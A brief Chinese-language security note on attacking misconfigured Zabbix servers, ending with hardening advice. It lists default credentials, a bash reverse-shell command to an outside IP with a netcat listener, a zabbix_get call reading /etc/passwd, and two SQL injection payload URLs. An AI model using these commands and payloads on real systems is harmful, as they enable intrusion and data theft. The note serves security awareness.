1:Zabbix配置不当安全事件
①案例事件
sohu的zabbix,可导致内网渗透
京东某站shell直入jae内网物理机内核版本过低
2:Zabbix弱口令利用
①弱口令
运维人员在初次安装zabbix时候,zabbix默认的口令为Admin:zabbix,以及存在guest密码为空,没有进行更改和禁止guest用户,导致zabbix存在致命漏洞,容易遭受攻击。
②Zabbix server可以远程在agent的机器上执行任意命令
建立监控项
命令调用:bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1
命令调用:nc -lvp 6666
zabbix_get命令调用
system.run[command,<mode>]这个模块是agent自带的,获取服务器shell,获取root权限。
命令调用:zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]'
3:Zabbix 注入利用
①
通过guest用户session的后16位替换连接的sid,即可通过user()调出当前的启动用户
Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
②
直接访问
jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
4:攻击方式
①默认口令
②注入漏洞
③BurpSuite爆破口令
5:防护措施
①zabbix放置在内网,不要暴露外网
②修改默认的口令密码
③禁止guest用户
④禁止以root启动
⑤401认证
⑥旧版本备份数据-升级zabbix版本